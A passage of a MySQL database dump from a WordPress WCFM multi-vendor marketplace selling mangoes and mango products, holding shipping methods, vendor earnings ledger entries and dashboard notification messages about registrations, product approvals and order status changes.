INSERT INTO `wp_wcfm_marketplace_shipping_zone_methods` VALUES (1,'flat_rate',3,21,1,'a:6:{s:5:\"title\";s:9:\"Flat Rate\";s:11:\"description\";s:35:\"Lets you charge a rate for shipping\";s:4:\"cost\";s:2:\"10\";s:10:\"tax_status\";s:4:\"none\";s:24:\"class_cost_no_class_cost\";s:0:\"\";s:16:\"calculation_type\";s:0:\"\";}'),(2,'free_shipping',3,21,1,'a:5:{s:5:\"title\";s:13:\"Free Shipping\";s:11:\"description\";s:35:\"Lets you charge a rate for shipping\";s:4:\"cost\";s:1:\"0\";s:10:\"tax_status\";s:4:\"none\";s:10:\"min_amount\";s:3:\"500\";}'),(3,'flat_rate',3,25,1,'a:6:{s:5:\"title\";s:9:\"Flat Rate\";s:11:\"description\";s:35:\"Lets you charge a rate for shipping\";s:4:\"cost\";s:2:\"30\";s:10:\"tax_status\";s:4:\"none\";s:24:\"class_cost_no_class_cost\";s:0:\"\";s:16:\"calculation_type\";s:0:\"\";}'),(4,'free_shipping',3,25,1,'a:5:{s:5:\"title\";s:13:\"Free Shipping\";s:11:\"description\";s:35:\"Lets you charge a rate for shipping\";s:4:\"cost\";s:1:\"0\";s:10:\"tax_status\";s:4:\"none\";s:10:\"min_amount\";s:4:\"1000\";}'),(5,'flat_rate',3,28,1,'a:6:{s:5:\"title\";s:9:\"Flat Rate\";s:11:\"description\";s:35:\"Lets you charge a rate for shipping\";s:4:\"cost\";s:1:\"0\";s:10:\"tax_status\";s:4:\"none\";s:24:\"class_cost_no_class_cost\";s:0:\"\";s:16:\"calculation_type\";s:0:\"\";}');
/*!40000 ALTER TABLE `wp_wcfm_marketplace_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_store_taxonomies`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_store_taxonomies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_store_taxonomies` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `term` bigint(20) NOT NULL,
  `parent` bigint(20) DEFAULT 0,
  `taxonomy` varchar(100) NOT NULL,
  `lang` varchar(20) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=199 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_store_taxonomies`
--

LOCK TABLES `wp_wcfm_marketplace_store_taxonomies` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_store_taxonomies` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_store_taxonomies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_vendor_ledger`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_vendor_ledger`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_vendor_ledger` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `credit` varchar(100) NOT NULL,
  `debit` varchar(100) NOT NULL,
  `reference_id` bigint(20) NOT NULL,
  `reference` varchar(100) NOT NULL,
  `reference_details` text NOT NULL,
  `reference_status` varchar(100) NOT NULL DEFAULT 'pending',
  `reference_update_date` timestamp NULL DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=38 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_vendor_ledger`
--

LOCK TABLES `wp_wcfm_marketplace_vendor_ledger` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_vendor_ledger` DISABLE KEYS */;
INSERT INTO `wp_wcfm_marketplace_vendor_ledger` VALUES (1,20,'385','0',1,'order','Earning for <b>test mango</b> order #<b>1002</b>.','completed','2022-02-24 05:17:03','2022-02-24 05:11:57'),(2,22,'224.8','0',2,'order','Earning for <b>test mango 7</b> order #<b>1005</b>.','processing','2022-02-24 10:07:37','2022-02-24 10:07:15'),(3,22,'224.8','0',3,'order','Earning for <b>test mango 7</b> order #<b>1008</b>.','cancel-request','2022-02-25 06:33:04','2022-02-25 04:03:41'),(4,2,'66.4','0',4,'order','Earning for <b>aaaa</b> order #<b>1008</b>.','cancel-request','2022-02-25 06:33:04','2022-02-25 04:03:41'),(5,2,'252','0',5,'order','Earning for <b>Banginapalli</b> order #<b>1012</b>.','completed','2022-02-25 06:01:09','2022-02-25 05:37:47'),(6,20,'360','0',6,'order','Earning for <b>test mango</b> order #<b>1012</b>.','completed','2022-02-25 06:01:09','2022-02-25 05:37:47'),(7,2,'151','0',7,'order','Earning for <b>Banginapalli</b> order #<b>1013</b>.','cancelled','2022-02-25 06:43:03','2022-02-25 06:34:23'),(8,20,'450','0',8,'order','Earning for <b>test mango 2</b> order #<b>1016</b>.','completed','2022-02-25 11:21:26','2022-02-25 11:09:01'),(9,22,'199.8','0',9,'order','Earning for <b>test mango 7</b> order #<b>1016</b>.','completed','2022-02-25 11:21:26','2022-02-25 11:09:01'),(10,20,'360','0',10,'order','Earning for <b>test mango</b> order #<b>1016</b>.','completed','2022-02-25 11:21:26','2022-02-25 11:09:01'),(11,20,'360','0',11,'order','Earning for <b>test mango</b> order #<b>1017</b>.','cancelled','2022-03-03 05:06:48','2022-02-25 11:24:49'),(12,22,'199.8','0',12,'order','Earning for <b>test mango 7</b> order #<b>1017</b>.','cancelled','2022-03-03 05:06:48','2022-02-25 11:24:49'),(13,22,'199.8','0',13,'order','Earning for <b>test mango 7</b> order #<b>1018</b>.','completed','2022-03-03 05:05:23','2022-03-03 05:04:03'),(14,25,'135.7','0',14,'order','Earning for <b>mangggoo</b> order #<b>1022</b>.','completed','2022-03-03 05:28:39','2022-03-03 05:26:23'),(15,2,'97','0',15,'order','Earning for <b>alphonsa</b> order #<b>1023</b>.','cancel-request','2022-03-03 05:37:48','2022-03-03 05:32:37'),(16,25,'135.7','0',16,'order','Earning for <b>mangggoo</b> order #<b>1023</b>.','cancel-request','2022-03-03 05:37:48','2022-03-03 05:32:37'),(17,25,'110','0',17,'order','Earning for <b>testmango</b> order #<b>1195</b>.','completed','2022-03-07 06:30:19','2022-03-07 06:24:07'),(18,21,'105.5','0',18,'order','Earning for <b>Mango Solapur Pickle</b> order #<b>1195</b>.','completed','2022-03-07 06:30:19','2022-03-07 06:24:07'),(19,21,'181','0',19,'order','Earning for <b>Mango Solapur Pickle</b> order #<b>1196</b>.','processing','2022-03-07 07:07:14','2022-03-07 07:06:45'),(20,21,'181','0',20,'order','Earning for <b>Mango hing UP style pickle &#8211; 250GM</b> order #<b>1196</b>.','processing','2022-03-07 07:07:14','2022-03-07 07:06:45'),(21,25,'110','0',21,'order','Earning for <b>testmango</b> order #<b>1196</b>.','processing','2022-03-07 07:07:14','2022-03-07 07:06:45'),(22,21,'469.1','0',22,'order','Earning for <b>Appemidi 5kg</b> order #<b>1197</b>.','processing','2022-03-07 07:18:38','2022-03-07 07:18:14'),(23,21,'95.5','0',23,'order','Earning for <b>Chhunda or gujarati sweet mango pickle &#8211; 250GM</b> order #<b>1198</b>.','processing','2022-03-07 07:20:58','2022-03-07 07:20:37'),(24,21,'44.2','0',24,'order','Earning for <b>Frooti Mango Drink Plastic Bottle &#8211; 600ml</b> order #<b>1198</b>.','processing','2022-03-07 07:20:58','2022-03-07 07:20:37'),(25,21,'105.5','0',25,'order','Earning for <b>Chhunda or gujarati sweet mango pickle &#8211; 250GM</b> order #<b>1199</b>.','processing','2022-03-07 07:23:21','2022-03-07 07:23:04'),(26,25,'110','0',26,'order','Earning for <b>testmango</b> order #<b>1199</b>.','processing','2022-03-07 07:23:21','2022-03-07 07:23:04'),(27,25,'110','0',27,'order','Earning for <b>testmango</b> order #<b>1200</b>.','processing','2022-03-07 07:35:05','2022-03-07 07:34:47'),(28,25,'90','0',28,'order','Earning for <b>testmango</b> order #<b>1201</b>.','processing','2022-03-07 09:34:56','2022-03-07 09:34:34'),(29,21,'95.5','0',29,'order','Earning for <b>Mango Solapur Pickle</b> order #<b>1201</b>.','processing','2022-03-07 09:34:56','2022-03-07 09:34:34'),(30,25,'90','0',30,'order','Earning for <b>testmango</b> order #<b>1202</b>.','cancelled','2022-10-10 21:57:58','2022-03-07 10:15:25'),(31,21,'459.1','0',31,'order','Earning for <b>Banginapalli Mango 5kg</b> order #<b>1202</b>.','cancelled','2022-10-10 21:57:58','2022-03-07 10:15:25'),(33,28,'538.2','0',33,'order','Earning for <b>mango</b> order #<b>1277</b>.','completed','2022-03-15 07:49:27','2022-03-15 07:47:05'),(34,28,'538.2','0',34,'order','Earning for <b>mango</b> order #<b>1278</b>.','processing','2022-03-15 07:51:03','2022-03-15 07:50:57'),(35,25,'899.1','0',35,'order','Earning for <b>Alphonso mango 3kg</b> order #<b>1278</b>.','processing','2022-03-15 07:51:03','2022-03-15 07:50:57'),(36,25,'929.1','0',36,'order','Earning for <b>Alphonso mango 3kg</b> order #<b>1279</b>.','completed','2022-03-15 07:59:12','2022-03-15 07:58:20'),(37,25,'929.1','0',37,'order','Earning for <b>Alphonso mango 3kg</b> order #<b>1280</b>.','processing','2022-03-15 08:02:44','2022-03-15 08:02:38');
/*!40000 ALTER TABLE `wp_wcfm_marketplace_vendor_ledger` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_withdraw_request`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_withdraw_request`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_withdraw_request` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `order_ids` longtext NOT NULL DEFAULT '',
  `commission_ids` longtext NOT NULL DEFAULT '',
  `payment_method` varchar(255) NOT NULL,
  `withdraw_amount` varchar(255) NOT NULL DEFAULT '0',
  `withdraw_charges` varchar(255) NOT NULL DEFAULT '0',
  `withdraw_status` varchar(100) NOT NULL DEFAULT 'pending',
  `withdraw_mode` varchar(100) NOT NULL DEFAULT 'by_request',
  `withdraw_note` longtext NOT NULL,
  `is_auto_withdrawal` tinyint(1) NOT NULL DEFAULT 0,
  `withdraw_paid_date` timestamp NULL DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_withdraw_request`
--

LOCK TABLES `wp_wcfm_marketplace_withdraw_request` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_withdraw_request` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_withdraw_request` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_withdraw_request_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_withdraw_request_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_withdraw_request_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `withdraw_id` bigint(20) NOT NULL,
  `key` varchar(255) NOT NULL,
  `value` varchar(255) NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_withdraw_request_meta`
--

LOCK TABLES `wp_wcfm_marketplace_withdraw_request_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_withdraw_request_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_withdraw_request_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_membership_subscription`
--

DROP TABLE IF EXISTS `wp_wcfm_membership_subscription`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_membership_subscription` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL DEFAULT 0,
  `membership_id` bigint(20) NOT NULL DEFAULT 0,
  `subscription_type` varchar(50) NOT NULL,
  `subscription_amt` int(10) NOT NULL DEFAULT 0,
  `subscription_interval` varchar(50) NOT NULL,
  `event` varchar(50) NOT NULL,
  `pay_mode` varchar(50) NOT NULL,
  `transaction_id` varchar(100) NOT NULL,
  `transaction_type` varchar(100) NOT NULL,
  `transaction_status` varchar(100) NOT NULL,
  `transaction_details` text NOT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`),
  UNIQUE KEY `membership_subscription` (`vendor_id`,`membership_id`,`transaction_id`,`transaction_type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_membership_subscription`
--

LOCK TABLES `wp_wcfm_membership_subscription` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_membership_subscription` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_membership_subscription` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_messages`
--

DROP TABLE IF EXISTS `wp_wcfm_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_messages` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `message` longtext NOT NULL,
  `author_id` bigint(20) NOT NULL DEFAULT 0,
  `reply_to` bigint(20) NOT NULL DEFAULT 0,
  `message_to` bigint(20) NOT NULL DEFAULT -1,
  `author_is_admin` tinyint(1) NOT NULL DEFAULT 0,
  `author_is_vendor` tinyint(1) NOT NULL DEFAULT 0,
  `author_is_customer` tinyint(1) NOT NULL DEFAULT 0,
  `is_notice` tinyint(1) NOT NULL DEFAULT 0,
  `is_direct_message` tinyint(1) NOT NULL DEFAULT 0,
  `is_pined` tinyint(1) NOT NULL DEFAULT 0,
  `message_type` varchar(100) NOT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=270 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_messages`
--

LOCK TABLES `wp_wcfm_messages` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_messages` DISABLE KEYS */;
INSERT INTO `wp_wcfm_messages` VALUES (1,'<b><a class=\\\"wcfm_dashboard_item_title\\\" href=\\\"https://www.mangomitra.in/store-manager/vendors-manage/5\\\" target=\\\"_blank\\\"></a></b> (Store: <b>m</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-01-28 10:11:01'),(2,'You have successfully registered to our site.',-1,0,5,1,0,0,0,1,0,'registration','2022-01-28 10:11:01'),(4,'New Inquiry <b><a target=\\\"_blank\\\" class=\\\"wcfm_dashboard_item_title\\\" href=\\\"https://mangomitra.in/store-manager/enquiry-manage/1\\\">#000001</a></b> received for <b>mango jam</b>',-1,0,5,1,0,0,0,1,0,'enquiry','2022-02-17 11:36:56'),(6,'<b><a class=\\\"wcfm_dashboard_item_title\\\" href=\\\"https://mangomitra.in/store-manager/vendors-manage/15\\\" target=\\\"_blank\\\"></a></b> (Store: <b>Njjo</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-02-17 11:58:03'),(7,'You have successfully registered to our site.',-1,0,15,1,0,0,0,1,0,'registration','2022-02-17 11:58:03'),(9,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/16\\\\\\\" target=\\\\\\\"_blank\\\\\\\">4dm16ec024.nimyajose</a></b> (Store: <b>aqw</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-02-22 05:21:19'),(10,'You have successfully registered to our site.',-1,0,16,1,0,0,0,1,0,'registration','2022-02-22 05:21:19'),(11,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/998\\\\\\\">998</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-22 11:28:53'),(13,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/19\\\\\\\" target=\\\\\\\"_blank\\\\\\\">Asdfghj</a></b> (Store: <b>Mmm</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-02-23 12:05:52'),(14,'You have successfully registered to our site.',-1,0,19,1,0,0,0,1,0,'registration','2022-02-23 12:05:52'),(16,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/20\\\\\\\" target=\\\\\\\"_blank\\\\\\\"></a></b> (Store: <b>Testingstore</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-02-23 12:13:15'),(17,'You have successfully registered to our site.',-1,0,20,1,0,0,0,1,0,'registration','2022-02-23 12:13:15'),(18,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1000\\\\\\\">test mango</a></b> awaiting for review',20,0,0,0,1,0,0,1,0,'product_review','2022-02-23 12:28:11'),(19,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango/\\\\\\\">test mango</a></b> has been approved.',-1,0,20,1,0,0,0,1,0,'product_review','2022-02-23 12:30:27'),(20,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1001\\\\\\\">test mango 2</a></b> awaiting for review',20,0,0,0,1,0,0,1,0,'product_review','2022-02-23 12:36:34'),(21,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango-2/\\\\\\\">test mango 2</a></b> has been approved.',-1,0,20,1,0,0,0,1,0,'product_review','2022-02-23 12:46:19'),(22,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1002\\\\\\\">1002</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-24 05:12:32'),(23,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1002\\\\\\\">1002</a></b> for <b>test mango</b>',-1,0,20,1,0,0,0,1,0,'order','2022-02-24 05:12:32'),(24,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1002\\\\\\\">1002</a></b> order status updated to <b>Completed</b>',-1,0,20,1,0,0,0,1,0,'status-update','2022-02-24 05:17:03'),(25,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1002\\\\\\\">1002</a></b> order status updated to <b>Completed</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-02-24 05:17:05'),(27,'<b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/vendors-manage/22\\\\\\\" target=\\\\\\\"_blank\\\\\\\">chethan</a></b> (Store: <b>test store 6</b>) successfully registered to our site.',-2,0,0,1,0,0,0,1,0,'registration','2022-02-24 09:42:46'),(28,'You have successfully registered to our site.',-1,0,22,1,0,0,0,1,0,'registration','2022-02-24 09:42:46'),(29,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1004\\\\\\\">test mango 7</a></b> awaiting for review',22,0,0,0,1,0,0,1,0,'product_review','2022-02-24 09:55:08'),(30,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango-7/\\\\\\\">test mango 7</a></b> has been approved.',-1,0,22,1,0,0,0,1,0,'product_review','2022-02-24 09:56:31'),(31,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1005\\\\\\\">1005</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-24 10:07:34'),(32,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1005\\\\\\\">1005</a></b> for <b>test mango 7</b>',-1,0,22,1,0,0,0,1,0,'order','2022-02-24 10:07:34'),(33,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/products-manage/1006\\\\\\\">test mango 9</a></b> awaiting for review',22,0,0,0,1,0,0,1,0,'product_review','2022-02-24 10:09:32'),(34,'Product <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango-9/\\\\\\\">test mango 9</a></b> has been approved.',-1,0,22,1,0,0,0,1,0,'product_review','2022-02-24 10:10:46'),(35,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/2\\\\\\\">#000002</a></b> received for <b>alphonsa</b>',-2,0,0,1,0,0,0,1,0,'enquiry','2022-02-24 10:41:34'),(36,'New Inquiry <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/enquiry-manage/2\\\\\\\">#000002</a></b> received for <b>alphonsa</b>',-1,0,2,1,0,0,0,1,0,'enquiry','2022-02-24 10:41:36'),(37,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1008\\\\\\\">1008</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-25 04:03:57'),(38,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1008\\\\\\\">1008</a></b> for <b>test mango 7</b>',-1,0,22,1,0,0,0,1,0,'order','2022-02-25 04:03:57'),(39,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1008\\\\\\\">1008</a></b> for <b>aaaa</b>',-1,0,2,1,0,0,0,1,0,'order','2022-02-25 04:03:57'),(40,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-25 05:38:02'),(41,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b> for <b>Banginapalli</b>',-1,0,2,1,0,0,0,1,0,'order','2022-02-25 05:38:02'),(42,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b> for <b>test mango</b>',-1,0,20,1,0,0,0,1,0,'order','2022-02-25 05:38:02'),(43,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b> order item <b><a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/product/test-mango/\\\\\\\">test mango</a></b> status updated to <b>Completed</b> by <b><a class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://mangomitra.in/store/testingstore/\\\\\\\">Testingstore</a></b>',20,0,0,0,1,0,0,1,0,'status-update','2022-02-25 05:59:01'),(44,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b> order status updated to <b>Completed</b>',-1,0,2,1,0,0,0,1,0,'status-update','2022-02-25 06:01:09'),(45,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b> order status updated to <b>Completed</b>',-1,0,20,1,0,0,0,1,0,'status-update','2022-02-25 06:01:10'),(46,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1012\\\\\\\">1012</a></b> order status updated to <b>Completed</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-02-25 06:01:12'),(47,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1008\\\\\\\">1008</a></b> order status updated to <b>Cancel Request</b>',-1,0,2,1,0,0,0,1,0,'status-update','2022-02-25 06:33:04'),(48,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1008\\\\\\\">1008</a></b> order status updated to <b>Cancel Request</b>',-1,0,22,1,0,0,0,1,0,'status-update','2022-02-25 06:33:06'),(49,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b>',-2,0,0,1,0,0,0,1,0,'order','2022-02-25 06:34:38'),(50,'You have received an Order <b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> for <b>Banginapalli</b>',-1,0,2,1,0,0,0,1,0,'order','2022-02-25 06:34:38'),(51,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> order status updated to <b>Cancel Request</b>',-1,0,2,1,0,0,0,1,0,'status-update','2022-02-25 06:35:00'),(52,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> order status updated to <b>Cancel Request</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-02-25 06:37:56'),(53,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> order status updated to <b>Completed</b>',-1,0,2,1,0,0,0,1,0,'status-update','2022-02-25 06:40:08'),(54,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" href=\\\\\\\"https://mangomitra.in/store-manager/orders-details/1013\\\\\\\">1013</a></b> order status updated to <b>Completed</b> by <b>sitemanager</b>',-2,0,0,1,0,0,0,1,0,'status-update','2022-02-25 06:40:10'),(55,'<b>#<a target=\\\\\\\"_blank\\\\\\\" class=\\\\\\\"wcfm_dashboard_item_title\\\\\\\" 